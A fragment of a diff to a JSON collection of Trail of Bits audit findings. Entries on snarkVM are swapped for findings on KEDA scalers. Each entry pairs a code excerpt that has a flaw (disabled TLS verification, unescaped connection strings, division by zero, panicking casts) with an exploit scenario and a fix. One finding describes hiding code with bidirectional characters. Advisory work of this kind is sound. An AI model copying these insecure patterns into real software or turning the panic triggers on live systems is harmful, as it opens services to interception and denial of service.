core::ops::arith::DivAssign<&snarkvm_fields::fp_256::Fp256>>::div_assign // at snarkvm/fields/src/fp_256.rs:709:26 // 5: as core::ops::arith::Div>::div // at snarkvm/fields/src/macros.rs:524:17 // 6: snarkvm_console_types_field::arithmetic::>::div // at ./src/arithmetic.rs:143: // 7: snarkvm_console_types_field::arithmetic::tests::test_div // at ./src/arithmetic.rs:305:23 Figure 1.1: Test triggering the division by zero The same issue is present in the Scalar type, which has no zero-check for other : impl Div> for Scalar { type Output = Scalar; /// Returns the `quotient` of `self` and `other`. #[inline] fn div ( self , other: Scalar ) -> Self ::Output { Scalar::new( self .scalar / other.scalar) } } Figure 1.2: console/types/scalar/src/arithmetic.rs#L137-L146 Exploit Scenario An attacker sends a zero value which is used in a division, causing a runtime error and the program to halt. Recommendations Short term, add checks to validate that the divisor is non-zero on both the Field and Scalar divisions. Long term, add tests exercising all arithmetic operations with the zero element.", + "title": "15. Dividend distribution has an incorrect rounding direction for negative rates ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "The rounding direction of the dividend calculation in the _processDividends function benefits the user when the dividend rate is negative, causing the fund to lose value it should retain. The division operation that computes dividend shares is rounding down in the _processDividends function of the MoneyMarketFund contract: function _processDividends ( address account , uint256 date , int256 rate , uint256 price ) internal whenHasHoldings(account) { uint256 dividendAmount = balanceOf(account) * uint256 (abs(rate)); uint256 dividendShares = dividendAmount / price; _payDividend(account, rate, dividendShares); // handle very unlikely scenario if occurs _handleNegativeYield(account, rate, dividendShares); _removeEmptyAccountFromHoldingsSet(account); emit DividendDistributed(account, date, rate, price, dividendShares); } Figure 15.1: The _processDividends function in the MoneyMarketFund contract As a result, for a negative dividend rate, the rounding benefits the user by subtracting a lower number of shares from the user balance. In particular, if the rate is low and the price is high, the dividend can round down to zero. The same issue affects the _processDividends function in the TransferAgentModule contract. Exploit Scenario Eve buys a small number of shares from multiple accounts. The dividend rounds down and is equal to zero. As a result, Eve avoids the losses from the downside movement of the fund while enjoying profits from the upside. Recommendations Short term, have the _processDividends function round up the number of dividendShares for negative dividend rates. Long term, document the expected rounding direction for every arithmetic operation (see appendix G ) and follow it to ensure that rounding is always beneficial to the fund. Use Echidna to find issues arising from the wrong rounding direction.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "2. from_xy_coordinates function lacks checks and can panic ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Unlike Group::from_x_coordinate , the Group::from_xy_coordinates function does not enforce that the resulting point is on the elliptic curve or in the correct subgroup. Two different behaviors can occur depending on the underlying curve: For a short Weierstrass curve (figure 2.1), the function will always succeed and not perform any membership checks on the point; this could lead to an invalid point being used in other curve operations, potentially leading to an invalid curve attack. /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y, infinity) = coordinates; Self { x, y, infinity } } Figure 2.1: No curve membership checks present at curves/src/templates/short_weierstrass_jacobian/affine.rs#L103-L107 For a twisted Edwards curve (figure 2.2), the function will panic if the point is not on the curve, unlike the from_x_coordinate function, which returns an Option . /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y) = coordinates; let point = Self { x, y }; assert! (point.is_on_curve()); point } Figure 2.2: curves/src/templates/twisted_edwards_extended/affine.rs#L102-L108 Exploit Scenario An attacker is able to construct an invalid point for the short Weierstrass curve, potentially revealing secrets if this point is used in scalar multiplications with secret data. Recommendations Short term, make the output type similar to the from_x_coordinate function, returning an Option . Enforce curve membership on the short Weierstrass implementation and consider returning None instead of panicking when the point is not on the twisted Edwards curve.", + "title": "1. Use of fmt.Sprintf to build host:port string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identifier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source files incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue.
2. MongoDB scaler does not encode username and password in connection string Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-KEDA-2 Target: pkg/scalers/mongo_scaler.go", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "3. Blake2Xs implementation fails to provide the requested number of bytes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Blake2Xs implementation returns an empty byte array when the requested number of bytes is between u16::MAX-30 and u16::MAX . Blake2Xs is an extendable-output function (XOF): It receives a parameter called xof_digest_length that determines how many bytes the hash function should return. When computing the necessary number of rounds, there is an integer overflow if xof_digest_length is between u16::MAX-30 and u16::MAX . This integer overflow causes the number of rounds to be zero and the resulting hash to have zero bytes. fn evaluate (input: & [ u8 ], xof_digest_length : u16 , persona: & [ u8 ]) -> Vec < u8 > { assert! (xof_digest_length > 0 , \"Output digest must be of non-zero length\" ); assert! (persona.len() <= 8 , \"Personalization may be at most 8 characters\" ); // Start by computing the digest of the input bytes. let xof_digest_length_node_offset = (xof_digest_length as u64 ) << 32 ; let input_digest = blake2s_simd::Params::new() .hash_length( 32 ) .node_offset(xof_digest_length_node_offset) .personal(persona) .hash(input); let mut output = vec! []; let num_rounds = ( xof_digest_length + 31 ) / 32 ; for node_offset in 0 ..num_rounds { Figure 3.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The finding is informational because the hash function is used only on the hash_to_curve routine, and never with an attacker-controlled digest length parameter. The currently used value is the size of the generator, which is not expected to reach values similar to u16::MAX . Exploit Scenario The Blake2Xs hash function is used with the maximum number of bytes, u16::MAX , to compare password hashes. Due to the vulnerability, any password will match the correct one since the hash output is always the empty array, allowing an attacker to gain access. Recommendations Short term, upcast the xof_digest_length variable to a larger type before the sum. This will prevent the overflow while enforcing the u16::MAX bound on the requested digest length. 4. Blake2Xs implementation's node offset definition differs from specification Severity: Informational Difficulty: High Type: Cryptography Finding ID: TOB-ALEOA-4 Target: console/algorithms/src/blake2xs/mod.rs", + "title": "3. Prometheus metrics server does not support TLS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not offer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS.
func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port 9022. When Prometheus makes a connection to the server, it is unencrypted, leaving both the request and response vulnerable to interception and tampering in transit. As KEDA does not support TLS for the server, the user has no way to ensure the confidentiality and integrity of these metrics. Recommendations Short term, provide a flag to enable TLS for Prometheus metrics exposed by the Metrics Adapter. The usual way to enable TLS for an HTTP server is using the http.ListenAndServeTLS function.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "5. Compiling cast instructions can lead to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The output_types function of the cast instruction assumes that the number of record or interface fields equals the number of input types. // missing checks for (input_type, (_, entry_type)) in input_types.iter().skip( 2 ). zip_eq(record.entries() ) { Figure 5.1: Invocation of zip_eq on two iterators that differ in length ( cast.rs:401 ) Therefore, compiling a program with an unmatched cast instruction will cause a runtime panic. The program in figure 5.2 casts two registers into an interface type with only one field: program aleotest.aleo; interface message: amount as u64; function test: input r0 as u64.private; cast r0 r0 into r1 as message; Figure 5.2: Program panics during compilation Figure 5.3 shows a program that will panic when compiling because it casts three registers into a record type with two fields: program aleotest.aleo; record token: owner as address.private; gates as u64.private; function test: input r0 as address.private; input r1 as u64.private; cast r0 r1 r1 into r2 as token.record; Figure 5.3: Program panics during compilation The following stack trace is printed in both cases: as core::iter::traits::iterator::Iterator>::next::h5c767bbe55881ac0 snarkvm_compiler::program::instruction::operation::cast::Cast::output_types::h3d1 251fbb81d620f snarkvm_compiler::process::stack::helpers::insert::>::check_instruction::h6bf69c769d8e877b snarkvm_compiler::process::stack::Stack::new::hb1c375f6e4331132 snarkvm_compiler::process::deploy::>::deploy::hd75a28b4fc14e19e snarkvm_fuzz::harness::fuzz_program::h131000d3e1900784 This bug was discovered through fuzzing with LibAFL . Figure 5.4: Stack trace Recommendations Short term, add a check to validate that the number of Cast arguments equals the number of record or interface fields.
Long term, review all other uses of zip_eq and check the length of their iterators.", + "title": "4. Return value is dereferenced before error check ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "After certain calls to http.NewRequestWithContext , the *Request return value is dereferenced before the error return value is checked (see the highlighted lines in figures 4.1 and 4.2). checkTokenRequest, err := http.NewRequestWithContext(ctx, \"HEAD\" , tokenURL.String(), nil ) checkTokenRequest.Header.Set( \"X-Subject-Token\" , token) checkTokenRequest.Header.Set( \"X-Auth-Token\" , token) if err != nil { return false , err } Figure 4.1: pkg/scalers/openstack/keystone_authentication.go#L118-L124 req, err := http.NewRequestWithContext(ctx, \"GET\" , url, nil ) req.SetBasicAuth(s.metadata.username, s.metadata.password) req.Header.Set( \"Origin\" , s.metadata.corsHeader) if err != nil { return - 1 , err } Figure 4.2: pkg/scalers/artemis_scaler.go#L241-L248 If an error occurred in the call to NewRequestWithContext , this behavior could result in a panic due to a nil pointer dereference. Exploit Scenario One of the calls to http.NewRequestWithContext shown in figures 4.1 and 4.2 returns an error and a nil *Request pointer. The subsequent code dereferences the nil pointer, resulting in a panic, crash, and DoS condition for the affected KEDA scaler. Recommendations Short term, check the error return value before accessing the returned *Request (e.g., by calling methods on it). Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: Undetermined" ] }, { - "title": "6. Displaying an Identifier can cause a panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Identifier of a program uses Fields internally. It is possible to construct an Identifier from an arbitrary bits array. However, the implementation of the Display trait of Identifier expects that this arbitrary data is valid UTF-8. Creating an identifier from a bytes array already checks whether the bytes are valid UTF-8. The following formatting function tries to create a UTF-8 string regardless of the bits of the field. fn fmt (& self , f: & mut Formatter) -> fmt :: Result { // Convert the identifier to bits. let bits_le = self . 0. to_bits_le(); // Convert the bits to bytes. let bytes = bits_le .chunks( 8 ) .map(|byte| u8 ::from_bits_le(byte).map_err(|_| fmt::Error)) .collect::< Result < Vec < u8 >, _>>()?; // Parse the bytes as a UTF-8 string. let string = String ::from_utf8(bytes).map_err(|_| fmt::Error)? ; ... } Figure 6.1: Relevant code ( parse.rs:76 ) As a result, constructing an Identifier with an invalid UTF-8 bit array will cause a runtime error when the Identifier is displayed.
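A sketch of the short-term recommendation from finding 4 above: the error from http.NewRequestWithContext is checked before the returned *http.Request is touched. The function name and parameters are illustrative, not KEDA's actual code.

```go
package main

import (
	"context"
	"net/http"
)

// buildRequest checks the error return value before the *http.Request is
// used; on error, req is nil and any header access would panic.
func buildRequest(ctx context.Context, url, user, pass string) (*http.Request, error) {
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
	if err != nil {
		return nil, err // req is nil here; return before dereferencing it
	}
	req.SetBasicAuth(user, pass)
	return req, nil
}
```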
The following test shows how to construct such an Identifier . #[test] fn test_invalid_identifier () { let invalid: & [ u8 ] = &[ 112 , 76 , 113 , 165 , 54 , 175 , 250 , 182 , 196 , 85 , 111 , 26 , 71 , 35 , 81 , 194 , 56 , 50 , 216 , 176 , 126 , 15 ]; let bits: Vec < bool > = invalid.iter().flat_map(|n| [n & ( 1 << 7 ) != 0 , n & ( 1 << 6 ) != 0 , n & ( 1 << 5 ) != 0 , n & ( 1 << 4 ) != 0 , n & ( 1 << 3 ) != 0 , n & ( 1 << 2 ) != 0 , n & ( 1 << 1 ) != 0 , n & ( 1 << 0 ) != 0 ]).collect(); let name = Identifier::from_bits_le(&bits).unwrap(); let network = Identifier::from_str( \"aleo\" ).unwrap(); let id = ProgramID::::from((name, network)); println!( \"{:?}\" , id.to_string()); } // a Display implementation returned an error unexpectedly: Error // thread 'program::tests::test_invalid_identifier' panicked at 'a Display implementation returned an error unexpectedly: Error', library/core/src/result.rs:1055:23 4: ::to_string at /rustc/dc80ca78b6ec2b6bba02560470347433bcd0bb3c/library/alloc/src/string.rs:2489:9 5: snarkvm_compiler::program::tests::test_invalid_identifier at ./src/program/mod.rs:650:26 Figure 6.2: Test causing a panic The testnet3_add_fuzz_tests branch has a workaround that prevents finding this issue. Using the arbitrary crate, it is likely that non-UTF-8 bit-strings end up in identifiers. We suggest fixing this bug instead of using the workaround. This bug was discovered through fuzzing with LibAFL. Recommendations Short term, we suggest using a placeholder like unprintable identifier instead of returning a formatting error. Alternatively, a check for UTF-8 could be added in Identifier::from_bits_le .", + "title": "5. Unescaped components in PostgreSQL connection string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The PostgreSQL scaler creates a connection string by formatting the configured host, port, username, database name, SSL mode, and password with fmt.Sprintf : meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf . According to the PostgreSQL documentation , To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value' . Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\ . As KEDA does not perform this escaping, the connection string could fail to parse if any of the configuration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. Although the latter attack violates assumptions about the application's behavior, it is not a severe issue in KEDA's case because users can already pass full connection strings via the connectionFromEnv configuration parameter. Exploit Scenario A user configures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation .
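As an illustration of that short-term recommendation, the following sketch quotes each parameter per the escaping rules quoted above. quotePgParam is a hypothetical helper, not an existing KEDA or library function.

```go
package main

import (
	"fmt"
	"strings"
)

// quotePgParam escapes one connection-string value per the PostgreSQL
// documentation: backslashes and single quotes are backslash-escaped, and
// the value is surrounded by single quotes so spaces and '=' lose their
// special meaning.
func quotePgParam(v string) string {
	v = strings.ReplaceAll(v, `\`, `\\`)
	v = strings.ReplaceAll(v, `'`, `\'`)
	return "'" + v + "'"
}

func main() {
	host, port, user, db, ssl, pass := "db.local", "5432", "keda", "metrics", "require", "p@ss word"
	conn := fmt.Sprintf("host=%s port=%s user=%s dbname=%s sslmode=%s password=%s",
		quotePgParam(host), quotePgParam(port), quotePgParam(user),
		quotePgParam(db), quotePgParam(ssl), quotePgParam(pass))
	fmt.Println(conn) // password='p@ss word' now parses as a single value
}
```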
Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "7. Build script causes compilation to rerun ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Using the current working directory as a rerun condition causes unnecessary recompilations, as any change in cargo's target directory will trigger a compilation. // Re-run upon any changes to the workspace. println!( \"cargo:rerun-if-changed=.\" ); Figure 7.1: Rerun condition in build.rs ( build.rs:57 ) The root build script also implements a check that all files include the proper license. However, the check is insufficient to catch all cases where developers forget to include a license. Adding a new empty Rust file without modifying any other file will not make the check in the build.rs fail because the check is not re-executed. Recommendations Short term, remove the rerun condition and use the default Cargo behavior . By default cargo reruns the build.rs script if any Rust file in the source tree has changed. Long term, consider using a git commit hook to check for missing licenses at the top of files. An example of such a commit hook can be found here .", + "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify field to the value of enableTLS (Figure 6.1), which means that certificate and server name verification is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineffective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the confidentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata field to true . Unbeknownst to the user, KEDA has disabled TLS certificate verification, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously influence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user specifies the enableTLS parameter.
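A sketch of what that second short-term recommendation could look like, assuming the go-redis client used by the scalers; newRedisOptions is a hypothetical constructor. If insecure connections must remain possible, a separate, explicitly named opt-out parameter would be the place for it, never enableTLS itself.

```go
package main

import (
	"crypto/tls"

	"github.com/go-redis/redis/v8"
)

// newRedisOptions enables TLS with a default tls.Config, so certificate and
// server-name verification stay on; InsecureSkipVerify is never derived
// from enableTLS.
func newRedisOptions(addr string, enableTLS bool) *redis.Options {
	opts := &redis.Options{Addr: addr}
	if enableTLS {
		opts.TLSConfig = &tls.Config{MinVersion: tls.VersionTLS12}
	}
	return opts
}
```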
7. Insufficient check against nil Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-KEDA-7 Target: pkg/scalers/azure_eventhub_scaler.go#L253-L259", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: High" ] }, { - "title": "8. Invisible codepoints are supported ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The current parser allows any Unicode character in strings or comments, which can include invisible bidirectional override characters . Using such characters can lead to differences between the code reviewed in a pull request and the compiled code. Figure 8.1 shows such a program: since r2 and r3 contain the hash of the same string, r4 is true , and r5 equals r1 , the output token has the amount field set to the second input. However, the compiled program always returns a token with a zero amount . // Program comparing aleo with aleo string program aleotest.aleo; record token: owner as address.private; gates as u64.private; amount as u64.private; function mint: input r0 as address.private; input r1 as u64.private; hash.psd2 \"aleo\" into r2; hash.psd2 \"aleo\" into r3; // Same string again is.eq r2 r3 into r4; // r4 is true because r2 == r3 ternary r4 r1 0u64 into r5; // r5 is r1 because r4 is true cast r0 0u64 r5 into r6 as token.record; output r6 as token.record; Figure 8.1: Aleo program that evaluates unexpectedly By default, VSCode shows the Unicode characters (figure 8.2). Google Docs and GitHub display the source code as in figure 8.1. Figure 8.2: The actual source This finding is inspired by CVE-2021-42574 . Recommendations Short term, reject the following code points: U+202A, U+202B, U+202C, U+202D, U+202E, U+2066, U+2067, U+2068, U+2069. This list might not be exhaustive. Therefore, consider disabling all non-ASCII characters in the Aleo language. In the future, consider introducing escape sequences so users can still use bidirectional code points if there is a legitimate use case.", + "title": "1. Use of fmt.Sprintf to build host:port string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Several scalers use a construct like fmt.Sprintf(\"%s:%s\", host, port) to create a host:port address string from a user-supplied host and port. This approach is problematic when the host is a literal IPv6 address, which should be enclosed in square brackets when the address is part of a resource identifier. An address created using simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source files incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port .
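The difference is easy to demonstrate with a small self-contained comparison of the two constructions (the addresses are illustrative):

```go
package main

import (
	"fmt"
	"net"
)

func main() {
	host, port := "2001:db8::1", "6379"

	// fmt.Sprintf yields an unparseable address for literal IPv6 hosts:
	bad := fmt.Sprintf("%s:%s", host, port) // 2001:db8::1:6379

	// net.JoinHostPort brackets IPv6 literals as required:
	good := net.JoinHostPort(host, port) // [2001:db8::1]:6379

	fmt.Println(bad, good)
}
```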
Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4362,139 +7040,149 @@ ] }, { - "title": "9. Merkle tree constructor panics with large leaf array ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Merkle tree constructor panics or returns a malformed Merkle tree when the provided leaves array has more than usize::MAX/2 elements. To build a Merkle tree, the constructor receives the necessary array of leaves. Being a binary tree, the final total number of nodes is computed using the smallest power of two above the number of leaves given: pub fn new (leaf_hasher: & LH , path_hasher: & PH , leaves: & [LH::Leaf]) -> Result < Self > { // Ensure the Merkle tree depth is greater than 0. ensure!(DEPTH > 0 , \"Merkle tree depth must be greater than 0\" ); // Ensure the Merkle tree depth is less than or equal to 64. ensure!(DEPTH <= 64 u8 , \"Merkle tree depth must be less than or equal to 64\" ); // Compute the maximum number of leaves. let max_leaves = leaves.len().next_power_of_two() ; // Compute the number of nodes. let num_nodes = max_leaves - 1 ; Figure 9.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The next_power_of_two function will panic in debug mode, and return 0 in release mode, if the number is larger than (1 << (N-1)) . For the usize type, on 64-bit machines, the function returns 0 for numbers above 2^63 . On 32-bit machines, the necessary number of leaves would be at least 1+2^31 . Exploit Scenario An attacker triggers a call to the Merkle tree constructor with 1+2^31 leaves, causing the 32-bit machine to abort due to a runtime error or to return a malformed Merkle tree. Recommendations Short term, use checked_next_power_of_two and check for success. Check all other uses of the next_power_of_two for similar issues.", + "title": "2. MongoDB scaler does not encode username and password in connection string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The MongoDB scaler creates a connection string URI by concatenating the configured host, port, username, and password: addr := fmt.Sprintf( \"%s:%s\" , meta.host, meta.port) auth := fmt.Sprintf( \"%s:%s\" , meta.username, meta.password) connStr = \"mongodb://\" + auth + \"@\" + addr + \"/\" + meta.dbName Figure 2.1: pkg/scalers/mongo_scaler.go#L191-L193 Per MongoDB documentation, if either the username or password contains a character in the set :/?#[]@ , it must be percent-encoded . However, KEDA does not do this. As a result, the constructed connection string could fail to parse. Exploit Scenario A user configures the MongoDB scaler with a password containing an @ character, and the MongoDB scaler does not encode the password in the connection string. As a result, when the client object is initialized, the URL fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, percent-encode the user-supplied username and password before constructing the connection string. Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, {
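One way to implement the short-term recommendation from finding 2 above is to let net/url perform the percent-encoding. mongoURI is a hypothetical helper, and the field names only mirror the scaler metadata.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// mongoURI builds the connection string with net/url, which percent-encodes
// the userinfo component automatically when the URL is serialized.
func mongoURI(host, port, user, pass, dbName string) string {
	u := url.URL{
		Scheme: "mongodb",
		User:   url.UserPassword(user, pass),
		Host:   net.JoinHostPort(host, port),
		Path:   "/" + dbName,
	}
	return u.String()
}

func main() {
	// A password containing '@' no longer breaks parsing:
	fmt.Println(mongoURI("mongo.local", "27017", "keda", "p@ss:word", "jobs"))
}
```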
- "title": "10. Downcast possibly truncates value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "To validate the console's Ciphertext field vector length against a u32 constant, the program downcasts the length from usize to u32 . This could cause a value truncation and a successful write when an error should occur. Then, the program downcasts the value to a u16 , not checking first if this is safe without truncation. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of field elements does not exceed the maximum allowed size. if self . 0. len() as u32 > N::MAX_DATA_SIZE_IN_FIELDS { return Err (error( \"Ciphertext is too large to encode in field elements.\" )); } // Write the number of ciphertext field elements. ( self . 0. len() as u16 ).write_le(& mut writer)?; // Write the ciphertext field elements. self . 0. write_le(& mut writer) } } Figure 10.1: console/program/src/data/ciphertext/bytes.rs#L36-L49 Figure 10.2 shows another instance where the value is downcast to u16 without checking if this is safe: // Ensure the number of field elements does not exceed the maximum allowed size. match num_fields <= N::MAX_DATA_SIZE_IN_FIELDS as usize { // Return the number of field elements. true => Ok ( num_fields as u16 ), Figure 10.2: console/program/src/data/ciphertext/size_in_fields.rs#L21-L30 A similar downcast is present in the Plaintext size_in_fields function . Currently, this downcast causes no issue because the N::MAX_DATA_SIZE_IN_FIELDS constant is less than u16::MAX . However, if this constant were changed, truncating downcasts could occur. Recommendations Short term, upcast N::MAX_DATA_SIZE_IN_FIELDS in Ciphertext::write_le to usize instead of downcasting the vector length, and ensure that the downcasts to u16 are safe.", + "title": "3. Prometheus metrics server does not support TLS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not offer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "11. 
